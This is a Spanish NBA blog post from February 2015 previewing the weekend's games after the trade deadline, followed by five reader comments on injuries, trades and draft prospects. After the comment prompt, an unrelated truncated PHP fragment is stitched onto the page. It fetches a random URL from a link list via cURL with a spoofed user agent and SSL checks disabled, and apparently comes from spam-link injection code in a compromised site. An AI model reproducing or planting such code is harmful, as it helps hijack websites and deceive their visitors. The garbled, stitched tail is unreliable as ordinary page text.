Fin de semana: Post Trade Madness

20 de February de 2015 por TheDeerHunter

Afrontamos el fin de semana con sentimientos encontrados. Fluctuamos entre el monazo de toda una semana sin nuestra dosis de competición unida a la curiosidad que nos despierta la vorágine de traspasos, cual chiquillos con zapatos nuevos, pero también con la congoja que nos produce el coágulo de sangre en un pulmón que supuestamente puede dejar out of season a Chris Bosh justo después del fallecimiento de una roca como Jerome Kersey a los 52 años a causa de un problema similar.

Hoy viernes se disputa un maratón de 13 partidos. En acción ambos líderes, los Hawks se miden a los Raptors y los Warriors cierran la jornada con un fascinante enfrentamiento contra los vigentes campeones. Del resto, algo menos interesante destacan el Rockets@Mavs y el Cavs@Wizards. Muchos partidos entre equipos más o menos activos en el trade deadline, aunque probablemente hoy no se verán los nuevos fichajes.

El sábado un receso de 5 partidos. Igual ya empezamos a ver alguna incorporación. Los “nuevos” Thunder tratarán de asaltar Charlotte. Los Suns tienen un difícil hueso en Chicago y los Pelicans visitan Miami. No obstante el partido más interesante con la clasificación en la mano puede ser el Raptors@Rockets. La jornada se cierra con un Kings@Clippers.

Por último, el domingo, otra buena sesión de partidos. 3 vespertinos: Cavs@Knicks, Hawks@Bucks y Wizards@Pistons. El más interesante, ya entrada la noche, Grizzlies@Blazers. Warriors@Pacers, Sixers@Magic, Nuggets@Thunder, Hornets@Mavs y “derby” Celtics@Lakers para cerrar el fin de semana.

Que ustedes lo disfruten.

Comenta

5 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Esperando ver un partido igualado y vaya repaso de los Cavaliers a los Wizards,38 puntos de renta y jugando en el Verizon.

      Citar

  2. Futurman dice:
    #2

    Kobe se retira :/

      Citar

  3. Triceratops dice:
    #3

    ¿Soy el unico que piensa el proximo Draft puede ser mejor que el tan famoso Draft 2014?

    He estado viendo los videos del DraftExpress y chico….los en teoría 5 mejores prospectos parecen realmente buenos, (Okafor, Mudiay, Russell, Towns y Stanley Johnson). Luego está Kelly Oubre que le dan un pick 10 en Nbadraft y me ha parecido buenisimo tambien. Y pata cuminar un gran Draft está Hezonja y un cacho carne para defender como Cauley-Stein.

    Porzingis no me mola mucho no sé como está tan arriba en los mocks, quizas por proyección/potencial ó por que ya tiene bastante experiencia en jugar con profesionales.

    Y el que me decepciona y me ha parecido un troncazo de los grandes es el tal Myles Turner. Le dan el pick 7 y lo comparan con Aldridge, aunque no sé yo de donde se han sacado eso porque me parece más un Kendrick Perkins en versión canija que al bueno de Lamarcus.

      Citar

  4. Ruxixón dice:
    #4

    Se prestan los Pelicans por eso de ser de una ciudad con tanta vinculación con el vudú y esas cosas a pensar que les han echado un mal de ojo.En el momento álgido de la temporada,cuando Oklahoma ha puesto velocidad de crucero y hay que aguantar como sea,se lesionan Davis en su hombro y Ryan Anderson en la rodilla.Ganaron gracias a un renacido Eric Gordon y con la buena actitud de Cole ante su equipo hace unas pocas horas,pero vaya precio han pagado.A ver la gravedad de ambas lesiones.

    Perkins firmó por Cleveland,no deja de ser gracioso (gracioso y Perkins en la misma frase,ojo) que vaya a jugar con LeBron,que la verdad ha puesto en las redes sociales un mensaje en plan colega que a mí me dejó extrañado,no contaba con ese buen rollo.En fin,como han trabajado en la gerencia para subsanar los errores de la planificación del verano.

    @TRcieratops: este año he seguido muy poco la NCAA,me pondré enseguida a tope con los torneos finales y por supuesto con la MM,así que no puedo hablar demasiado sobre la próxima hornada.Está la cosa entre el talento de Okafor,al mismo nivel la clase de Mudiay y Russell (mi preferido) y luego hay un corte,predominando aleros e interiores ante todo físicos.

      Citar

  5. Ruxixón dice:
    #5

    Sullinger otro que se pierde la temporada,fractura en un dedo del pie 🙁

    Y luego otra tema,más anecdótico que otra cosa,los Pelicans cortan a Shawne Williams. Todos sorprendidos por ese jugador que en Miami arrancó como un tiro por allá el mes de noviembre y que poco a poco fue perdiendo peso en el equipo hasta llegar el día de hoy.Las vueltas que da la vida.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>